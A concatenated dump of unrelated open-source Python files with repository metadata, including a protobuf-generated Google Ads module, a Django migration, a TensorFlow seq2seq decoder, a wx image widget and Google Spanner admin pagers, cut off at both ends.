_sym_db.RegisterEnumDescriptor(_KEYWORDPLANKEYWORDERRORENUM_KEYWORDPLANKEYWORDERROR)
_KEYWORDPLANKEYWORDERRORENUM = _descriptor.Descriptor(
name='KeywordPlanKeywordErrorEnum',
full_name='google.ads.googleads.v3.errors.KeywordPlanKeywordErrorEnum',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_KEYWORDPLANKEYWORDERRORENUM_KEYWORDPLANKEYWORDERROR,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=136,
serialized_end=394,
)
_KEYWORDPLANKEYWORDERRORENUM_KEYWORDPLANKEYWORDERROR.containing_type = _KEYWORDPLANKEYWORDERRORENUM
DESCRIPTOR.message_types_by_name['KeywordPlanKeywordErrorEnum'] = _KEYWORDPLANKEYWORDERRORENUM
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
KeywordPlanKeywordErrorEnum = _reflection.GeneratedProtocolMessageType('KeywordPlanKeywordErrorEnum', (_message.Message,), dict(
DESCRIPTOR = _KEYWORDPLANKEYWORDERRORENUM,
__module__ = 'google.ads.googleads_v3.proto.errors.keyword_plan_keyword_error_pb2'
,
__doc__ = """Container for enum describing possible errors from applying a keyword or
a negative keyword from a keyword plan.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v3.errors.KeywordPlanKeywordErrorEnum)
))
_sym_db.RegisterMessage(KeywordPlanKeywordErrorEnum)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
f69a5854f33bc30eb43daf851f9e43ceb207ec1a | b7948d60834c4c6fe58d8d665177511cb6db53e2 | /Outpass Webapp + Api's - Django/student/migrations/0008_auto_20190815_0023.py | 08405388f8bb2400e3756da54e002813b1d1e8b2 | [] | no_license | abhinavsharma629/Outpass-Generator | 4a2ebc2c7d0fc678b2afd10a36c6cbcbc6583d60 | f363d49c47543c70e2c114ab7d48ffaef83b5de4 | refs/heads/master | 2022-02-24T15:07:58.171462 | 2019-10-05T16:05:09 | 2019-10-05T16:05:09 | 205,933,273 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,289 | py | # Generated by Django 2.2.4 on 2019-08-14 18:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('student', '0007_registeredcolleges_logo'),
]
operations = [
migrations.AlterField(
model_name='student',
name='bed_no',
field=models.PositiveIntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='student',
name='branch',
field=models.CharField(blank=True, max_length=50, null=True),
),
migrations.AlterField(
model_name='student',
name='er_no',
field=models.CharField(blank=True, max_length=7, null=True),
),
migrations.AlterField(
model_name='student',
name='hostel',
field=models.CharField(blank=True, max_length=50, null=True),
),
migrations.AlterField(
model_name='student',
name='room_no',
field=models.CharField(blank=True, max_length=50, null=True),
),
migrations.AlterField(
model_name='student',
name='year',
field=models.PositiveIntegerField(blank=True, null=True),
),
]
| [
"[email protected]"
] | |
5a5e091b0cb0991756eaa7e0c7fdb809951c7cd4 | d158e396e083ad6761a1871bd39519d588c461bc | /hw/9dcv/contrib_seq2seq.py | e2a412f09abce6ff8f5b388720e649b2947d8530 | [] | no_license | jendelel/npfl114 | c7250e6256f556c2e9f134dce2f2148117c43368 | 44a562e2aae96a9e30f930cfae7985043f172828 | refs/heads/master | 2021-01-10T18:07:46.310969 | 2017-01-16T15:10:04 | 2017-01-16T15:10:04 | 71,621,825 | 1 | 2 | null | 2017-01-05T09:59:18 | 2016-10-22T06:42:31 | Python | UTF-8 | Python | false | false | 9,159 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Seq2seq layer operations for use in neural networks.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import layers
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope as vs
# decoder_fn(time, cell_state, cell_input, cell_output, context_state)
# -> (done, next_state, next_input, emit_output, next_context_state)
def dynamic_rnn_decoder(cell, decoder_fn, inputs=None, sequence_length=None,
parallel_iterations=None, swap_memory=False,
time_major=False, scope=None, name=None):
""" Dynamic RNN decoder for a sequence-to-sequence model specified by
RNNCell and decoder function.
The `dynamic_rnn_decoder` is similar to the `tf.python.ops.rnn.dynamic_rnn`
as the decoder does not make any assumptions of sequence length and batch
size of the input.
The `dynamic_rnn_decoder` has two modes: training or inference and expects
  the user to create separate functions for each.
  Under both training and inference, `cell` and `decoder_fn` are expected, where
the `cell` performs computation at every timestep using the `raw_rnn` and
the `decoder_fn` allows modelling of early stopping, output, state, and next
input and context.
When training the user is expected to supply `inputs`. At every time step a
slice of the supplied input is fed to the `decoder_fn`, which modifies and
returns the input for the next time step.
`sequence_length` is needed at training time, i.e., when `inputs` is not
None, for dynamic unrolling. At test time, when `inputs` is None,
`sequence_length` is not needed.
Under inference `inputs` is expected to be `None` and the input is inferred
solely from the `decoder_fn`.
Args:
cell: An instance of RNNCell.
decoder_fn: A function that takes time, cell state, cell input,
cell output and context state. It returns a early stopping vector,
cell state, next input, cell output and context state.
Examples of decoder_fn can be found in the decoder_fn.py folder.
inputs: The inputs for decoding (embedded format).
If `time_major == False` (default), this must be a `Tensor` of shape:
`[batch_size, max_time, ...]`.
If `time_major == True`, this must be a `Tensor` of shape:
`[max_time, batch_size, ...]`.
The input to `cell` at each time step will be a `Tensor` with dimensions
`[batch_size, ...]`.
sequence_length: (optional) An int32/int64 vector sized `[batch_size]`.
if `inputs` is not None and `sequence_length` is None it is inferred
from the `inputs` as the maximal possible sequence length.
parallel_iterations: (Default: 32). The number of iterations to run in
parallel. Those operations which do not have any temporal dependency
and can be run in parallel, will be. This parameter trades off
time for space. Values >> 1 use more memory but take less time,
while smaller values use less memory but computations take longer.
swap_memory: Transparently swap the tensors produced in forward inference
but needed for back prop from GPU to CPU. This allows training RNNs
which would typically not fit on a single GPU, with very minimal (or no)
performance penalty.
time_major: The shape format of the `inputs` and `outputs` Tensors.
If true, these `Tensors` must be shaped `[max_time, batch_size, depth]`.
If false, these `Tensors` must be shaped `[batch_size, max_time, depth]`.
Using `time_major = True` is a bit more efficient because it avoids
transposes at the beginning and end of the RNN calculation. However,
most TensorFlow data is batch-major, so by default this function
accepts input and emits output in batch-major form.
scope: VariableScope for the `raw_rnn`;
defaults to None.
name: NameScope for the decoder;
defaults to "dynamic_rnn_decoder"
Returns:
A pair (outputs, state) where:
outputs: the RNN output 'Tensor'.
If time_major == False (default), this will be a `Tensor` shaped:
`[batch_size, max_time, cell.output_size]`.
If time_major == True, this will be a `Tensor` shaped:
`[max_time, batch_size, cell.output_size]`.
state: The final state and will be shaped
`[batch_size, cell.state_size]`.
Raises:
ValueError: if inputs is not None and has less than three dimensions.
"""
with ops.name_scope(name, "dynamic_rnn_decoder",
[cell, decoder_fn, inputs, sequence_length,
parallel_iterations, swap_memory, time_major, scope]):
if inputs is not None:
# Convert to tensor
inputs = ops.convert_to_tensor(inputs)
# Test input dimensions
if inputs.get_shape().ndims is not None and (
inputs.get_shape().ndims < 2):
raise ValueError("Inputs must have at least two dimensions")
# Setup of RNN (dimensions, sizes, length, initial state, dtype)
if not time_major:
# [batch, seq, features] -> [seq, batch, features]
inputs = array_ops.transpose(inputs, perm=[1, 0, 2])
dtype = inputs.dtype
# Get data input information
input_depth = int(inputs.get_shape()[2])
batch_depth = inputs.get_shape()[1].value
max_time = inputs.get_shape()[0].value
if max_time is None:
max_time = array_ops.shape(inputs)[0]
# Setup decoder inputs as TensorArray
inputs_ta = tensor_array_ops.TensorArray(dtype, size=max_time)
inputs_ta = inputs_ta.unpack(inputs)
def loop_fn(time, cell_output, cell_state, loop_state):
if cell_state is None: # first call, before while loop (in raw_rnn)
if cell_output is not None:
raise ValueError("Expected cell_output to be None when cell_state "
"is None, but saw: %s" % cell_output)
if loop_state is not None:
raise ValueError("Expected loop_state to be None when cell_state "
"is None, but saw: %s" % loop_state)
context_state = None
      else:  # subsequent calls, inside while loop, after cell execution
if isinstance(loop_state, tuple):
(done, context_state) = loop_state
else:
done = loop_state
context_state = None
# call decoder function
if inputs is not None: # training
# get next_cell_input
if cell_state is None:
next_cell_input = inputs_ta.read(0)
else:
if batch_depth is not None:
batch_size = batch_depth
else:
batch_size = array_ops.shape(done)[0]
next_cell_input = control_flow_ops.cond(
math_ops.equal(time, max_time),
lambda: array_ops.zeros([batch_size, input_depth], dtype=dtype),
lambda: inputs_ta.read(time))
(next_done, next_cell_state, next_cell_input, emit_output,
next_context_state) = decoder_fn(time, cell_state, next_cell_input,
cell_output, context_state)
else: # inference
# next_cell_input is obtained through decoder_fn
(next_done, next_cell_state, next_cell_input, emit_output,
next_context_state) = decoder_fn(time, cell_state, None, cell_output,
context_state)
# check if we are done
if next_done is None: # training
next_done = time >= sequence_length
# build next_loop_state
if next_context_state is None:
next_loop_state = next_done
else:
next_loop_state = (next_done, next_context_state)
return (next_done, next_cell_input, next_cell_state,
emit_output, next_loop_state)
# Run raw_rnn function
outputs_ta, state, _ = rnn.raw_rnn(
cell, loop_fn, parallel_iterations=parallel_iterations,
swap_memory=swap_memory, scope=scope)
outputs = outputs_ta.pack()
if not time_major:
# [seq, batch, features] -> [batch, seq, features]
outputs = array_ops.transpose(outputs, perm=[1, 0, 2])
return outputs, state
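# A minimal usage sketch (not part of the original file): a training-mode
# `decoder_fn` with exactly the signature documented above.  `encoder_state` is
# assumed to be the final state of an encoder built elsewhere; on the first
# call (cell_state is None) the encoder state is returned, afterwards the cell
# state and the teacher-forced input are passed straight through unchanged.
def _sketch_decoder_fn_train(encoder_state):
  def decoder_fn(time, cell_state, cell_input, cell_output, context_state):
    if cell_state is None:  # first call, before the raw_rnn while loop
      cell_state = encoder_state
    # Returning done=None makes dynamic_rnn_decoder fall back to
    # `sequence_length` for early stopping during training.
    return (None, cell_state, cell_input, cell_output, context_state)
  return decoder_fn
# Assumed call site (cell, encoder_state, decoder_inputs and decoder_lengths
# are placeholders for objects built elsewhere):
#   outputs, state = dynamic_rnn_decoder(
#       cell=cell, decoder_fn=_sketch_decoder_fn_train(encoder_state),
#       inputs=decoder_inputs, sequence_length=decoder_lengths)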
| [
"[email protected]"
] | |
7d5a0bdd30acb51aa2d53b292d0cadc6076e129e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03068/s875123408.py | 7ebd0a3af325dded24435da6029b158873c69c05 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 166 | py | n = int(input())
s = list(input())
k = int(input())
# Mask the string: every character that differs from the K-th character
# becomes '*', then the masked string is printed.
for i in range(n):
    if s[i] != s[k - 1]:
        s[i] = '*'
print(*s, sep='')
| [
"[email protected]"
] | |
f3bb6fb019a485fe0bec264817b74915c0530643 | 7323b8039f47c0457ae90173c963549b7d1e6823 | /sandbox/src1/histdemo.py | a8514133c69af80b7c5f510d812d969b0da96add | [
"LicenseRef-scancode-public-domain",
"BSD-2-Clause"
] | permissive | sniemi/SamPy | abce0fb941f011a3264a8d74c25b522d6732173d | e048756feca67197cf5f995afd7d75d8286e017b | refs/heads/master | 2020-05-27T18:04:27.156194 | 2018-12-13T21:19:55 | 2018-12-13T21:19:55 | 31,713,784 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 361 | py | from matplotlib import rcParams
from pylab import *
mu, sigma = 100, 15
x = mu + sigma*randn(10000)
# the histogram of the data
n, bins, patches = hist(x, 100, normed=1)
# add a 'best fit' line
y = normpdf(bins, mu, sigma)
l = plot(bins, y, 'r--', linewidth=2)
xlim(40, 160)
xlabel('Smarts')
ylabel('P')
title(r'$\rm{IQ:}\/ \mu=100,\/ \sigma=15$')
show()
| [
"[email protected]"
] | |
d8b1f7b564f9c8a9889d070590faa58b2928a4d8 | c6d22cf128819af1d48d02972bb9296a1687b9bb | /venv/Lib/site-packages/pyface/ui/wx/image_widget.py | 2e50ff64cb90378c94caab22abc79b27e902d0f7 | [
"BSD-3-Clause"
] | permissive | GenomePhD/Bio1-HIV | 92808a1e7e6339da6d07190ba3e1a2071f3e8428 | b5059e7f121e4abb6888893f91f95dd79aed9ca4 | refs/heads/master | 2022-10-28T21:55:42.998205 | 2018-04-16T18:52:32 | 2018-04-16T18:52:32 | 129,792,081 | 0 | 1 | null | 2022-10-05T18:36:22 | 2018-04-16T19:03:26 | Python | UTF-8 | Python | false | false | 7,447 | py | #------------------------------------------------------------------------------
# Copyright (c) 2005, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.
# Description: <Enthought pyface package component>
#------------------------------------------------------------------------------
""" A clickable/draggable widget containing an image. """
# Major package imports.
import wx
# Enthought library imports.
from traits.api import Any, Bool, Event
# Local imports.
from .widget import Widget
class ImageWidget(Widget):
""" A clickable/draggable widget containing an image. """
#### 'ImageWidget' interface ##############################################
# The bitmap.
bitmap = Any
# Is the widget selected?
selected = Bool(False)
#### Events ####
# A key was pressed while the tree is in focus.
key_pressed = Event
# A node has been activated (ie. double-clicked).
node_activated = Event
# A drag operation was started on a node.
node_begin_drag = Event
# A (non-leaf) node has been collapsed.
node_collapsed = Event
# A (non-leaf) node has been expanded.
node_expanded = Event
# A left-click occurred on a node.
node_left_clicked = Event
# A right-click occurred on a node.
node_right_clicked = Event
#### Private interface ####################################################
_selected = Any
###########################################################################
# 'object' interface.
###########################################################################
def __init__ (self, parent, **traits):
""" Creates a new widget. """
# Base class constructors.
super(ImageWidget, self).__init__(**traits)
# Add some padding around the image.
size = (self.bitmap.GetWidth() + 10, self.bitmap.GetHeight() + 10)
# Create the toolkit-specific control.
self.control = wx.Window(parent, -1, size=size)
self.control.__tag__ = 'hack'
self._mouse_over = False
self._button_down = False
# Set up mouse event handlers:
self.control.Bind(wx.EVT_ENTER_WINDOW, self._on_enter_window)
self.control.Bind(wx.EVT_LEAVE_WINDOW, self._on_leave_window)
self.control.Bind(wx.EVT_LEFT_DCLICK, self._on_left_dclick)
self.control.Bind(wx.EVT_LEFT_DOWN, self._on_left_down)
self.control.Bind(wx.EVT_LEFT_UP, self._on_left_up)
self.control.Bind(wx.EVT_PAINT, self._on_paint)
# Pens used to draw the 'selection' marker:
# ZZZ: Make these class instances when moved to the wx toolkit code.
self._selectedPenDark = wx.Pen(
wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DSHADOW), 1,
wx.PENSTYLE_SOLID
)
self._selectedPenLight = wx.Pen(
wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DHIGHLIGHT), 1,
wx.PENSTYLE_SOLID
)
return
###########################################################################
# Private interface.
###########################################################################
#### Trait event handlers #################################################
def _bitmap_changed(self, bitmap):
""" Called when the widget's bitmap is changed. """
if self.control is not None:
self.control.Refresh()
return
def _selected_changed(self, selected):
""" Called when the selected state of the widget is changed. """
if selected:
for control in self.GetParent().GetChildren():
if hasattr(control, '__tag__'):
if control.Selected():
control.Selected(False)
break
self.Refresh()
return
#### wx event handlers ####################################################
    def _on_enter_window(self, event):
        """ Called when the mouse enters the widget. """
        if self._selected is not None:
            self._mouse_over = True
            self.control.Refresh()
        return
    def _on_leave_window(self, event):
        """ Called when the mouse leaves the widget. """
        if self._mouse_over:
            self._mouse_over = False
            self.control.Refresh()
        return
def _on_left_dclick(self, event):
""" Called when the left mouse button is double-clicked. """
#print 'left dclick'
event.Skip()
return
    def _on_left_down ( self, event = None ):
        """ Called when the left mouse button goes down on the widget. """
        #print 'left down'
        if self._selected is not None:
            self.control.CaptureMouse()
            self._button_down = True
            self.control.Refresh()
        event.Skip()
        return
    def _on_left_up ( self, event = None ):
        """ Called when the left mouse button goes up on the widget. """
        #print 'left up'
        need_refresh = self._button_down
        if need_refresh:
            self.control.ReleaseMouse()
            self._button_down = False
        if self._selected is not None:
            wdx, wdy = self.control.GetClientSizeTuple()
            x = event.GetX()
            y = event.GetY()
            if (0 <= x < wdx) and (0 <= y < wdy):
                if self._selected != -1:
                    self.Selected( True )
                elif need_refresh:
                    self.control.Refresh()
                return
        if need_refresh:
            self.control.Refresh()
        event.Skip()
        return
def _on_paint ( self, event = None ):
""" Called when the widget needs repainting. """
wdc = wx.PaintDC( self.control )
wdx, wdy = self.control.GetClientSizeTuple()
bitmap = self.bitmap
bdx = bitmap.GetWidth()
bdy = bitmap.GetHeight()
        wdc.DrawBitmap( bitmap, (wdx - bdx) // 2, (wdy - bdy) // 2, True )
pens = [ self._selectedPenLight, self._selectedPenDark ]
bd = self._button_down
if self._mouse_over:
wdc.SetBrush( wx.TRANSPARENT_BRUSH )
wdc.SetPen( pens[ bd ] )
wdc.DrawLine( 0, 0, wdx, 0 )
wdc.DrawLine( 0, 1, 0, wdy )
wdc.SetPen( pens[ 1 - bd ] )
wdc.DrawLine( wdx - 1, 1, wdx - 1, wdy )
wdc.DrawLine( 1, wdy - 1, wdx - 1, wdy - 1 )
if self._selected == True:
wdc.SetBrush( wx.TRANSPARENT_BRUSH )
wdc.SetPen( pens[ bd ] )
wdc.DrawLine( 1, 1, wdx - 1, 1 )
wdc.DrawLine( 1, 1, 1, wdy - 1 )
wdc.DrawLine( 2, 2, wdx - 2, 2 )
wdc.DrawLine( 2, 2, 2, wdy - 2 )
wdc.SetPen( pens[ 1 - bd ] )
wdc.DrawLine( wdx - 2, 2, wdx - 2, wdy - 1 )
wdc.DrawLine( 2, wdy - 2, wdx - 2, wdy - 2 )
wdc.DrawLine( wdx - 3, 3, wdx - 3, wdy - 2 )
wdc.DrawLine( 3, wdy - 3, wdx - 3, wdy - 3 )
return
#### EOF ######################################################################
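# A hedged usage sketch (not part of the original module); shown as comments so
# that importing this file stays side-effect free.  The frame and the bitmap
# file name are assumptions.
#
#   import wx
#   app = wx.App()
#   frame = wx.Frame(None, title='ImageWidget demo')
#   widget = ImageWidget(frame, bitmap=wx.Bitmap('icon.png', wx.BITMAP_TYPE_PNG))
#   frame.Show()
#   app.MainLoop()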
| [
"[email protected]"
] | |
53f1e2f513a9735af030b686847f828c7d25a6f9 | eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7 | /google/spanner/admin/database/v1/admin-database-v1-py/google/cloud/spanner_admin_database_v1/services/database_admin/pagers.py | 77fee41bb742a42304fa72cb45903814dd541b52 | [
"Apache-2.0"
] | permissive | Tryweirder/googleapis-gen | 2e5daf46574c3af3d448f1177eaebe809100c346 | 45d8e9377379f9d1d4e166e80415a8c1737f284d | refs/heads/master | 2023-04-05T06:30:04.726589 | 2021-04-13T23:35:20 | 2021-04-13T23:35:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,767 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Any, AsyncIterable, Awaitable, Callable, Iterable, Sequence, Tuple, Optional
from google.cloud.spanner_admin_database_v1.types import backup
from google.cloud.spanner_admin_database_v1.types import spanner_database_admin
from google.longrunning import operations_pb2 as operations # type: ignore
class ListDatabasesPager:
"""A pager for iterating through ``list_databases`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse` object, and
provides an ``__iter__`` method to iterate through its
``databases`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListDatabases`` requests and continue to iterate
through the ``databases`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., spanner_database_admin.ListDatabasesResponse],
request: spanner_database_admin.ListDatabasesRequest,
response: spanner_database_admin.ListDatabasesResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListDatabasesRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = spanner_database_admin.ListDatabasesRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[spanner_database_admin.ListDatabasesResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[spanner_database_admin.Database]:
for page in self.pages:
yield from page.databases
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
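# A short usage sketch (not part of the generated file).  The `client` argument
# is assumed to be a DatabaseAdminClient whose `list_databases` call returns a
# ListDatabasesPager; `instance_name` is a full instance resource name.
def _example_iterate_databases(client, instance_name):
    """Illustrative only: yield the name of every database under an instance."""
    pager = client.list_databases(parent=instance_name)
    for database in pager:  # additional pages are fetched transparently
        yield database.name
    # Alternatively, iterate one response page at a time:
    # for page in pager.pages:
    #     ...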
class ListDatabasesAsyncPager:
"""A pager for iterating through ``list_databases`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse` object, and
provides an ``__aiter__`` method to iterate through its
``databases`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListDatabases`` requests and continue to iterate
through the ``databases`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[spanner_database_admin.ListDatabasesResponse]],
request: spanner_database_admin.ListDatabasesRequest,
response: spanner_database_admin.ListDatabasesResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListDatabasesRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListDatabasesResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = spanner_database_admin.ListDatabasesRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[spanner_database_admin.ListDatabasesResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[spanner_database_admin.Database]:
async def async_generator():
async for page in self.pages:
for response in page.databases:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
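# Async counterpart sketch (not part of the generated file).  With an assumed
# DatabaseAdminAsyncClient the call itself is awaited and the resulting
# ListDatabasesAsyncPager is consumed with `async for`.
async def _example_iterate_databases_async(async_client, instance_name):
    """Illustrative only: collect every database name under an instance."""
    pager = await async_client.list_databases(parent=instance_name)
    return [database.name async for database in pager]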
class ListBackupsPager:
"""A pager for iterating through ``list_backups`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListBackupsResponse` object, and
provides an ``__iter__`` method to iterate through its
``backups`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListBackups`` requests and continue to iterate
through the ``backups`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListBackupsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., backup.ListBackupsResponse],
request: backup.ListBackupsRequest,
response: backup.ListBackupsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListBackupsRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListBackupsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = backup.ListBackupsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[backup.ListBackupsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[backup.Backup]:
for page in self.pages:
yield from page.backups
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListBackupsAsyncPager:
"""A pager for iterating through ``list_backups`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListBackupsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``backups`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListBackups`` requests and continue to iterate
through the ``backups`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListBackupsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[backup.ListBackupsResponse]],
request: backup.ListBackupsRequest,
response: backup.ListBackupsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListBackupsRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListBackupsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = backup.ListBackupsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[backup.ListBackupsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[backup.Backup]:
async def async_generator():
async for page in self.pages:
for response in page.backups:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListDatabaseOperationsPager:
"""A pager for iterating through ``list_database_operations`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse` object, and
provides an ``__iter__`` method to iterate through its
``operations`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListDatabaseOperations`` requests and continue to iterate
through the ``operations`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., spanner_database_admin.ListDatabaseOperationsResponse],
request: spanner_database_admin.ListDatabaseOperationsRequest,
response: spanner_database_admin.ListDatabaseOperationsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsRequest):
The initial request object.
response (google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = spanner_database_admin.ListDatabaseOperationsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[spanner_database_admin.ListDatabaseOperationsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[operations.Operation]:
for page in self.pages:
yield from page.operations
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListDatabaseOperationsAsyncPager:
"""A pager for iterating through ``list_database_operations`` requests.
This class thinly wraps an initial
:class:`google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``operations`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListDatabaseOperations`` requests and continue to iterate
through the ``operations`` field on the
corresponding responses.
All the usual :class:`google.cloud.spanner_admin_database_v1.types.ListDatabaseOperationsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
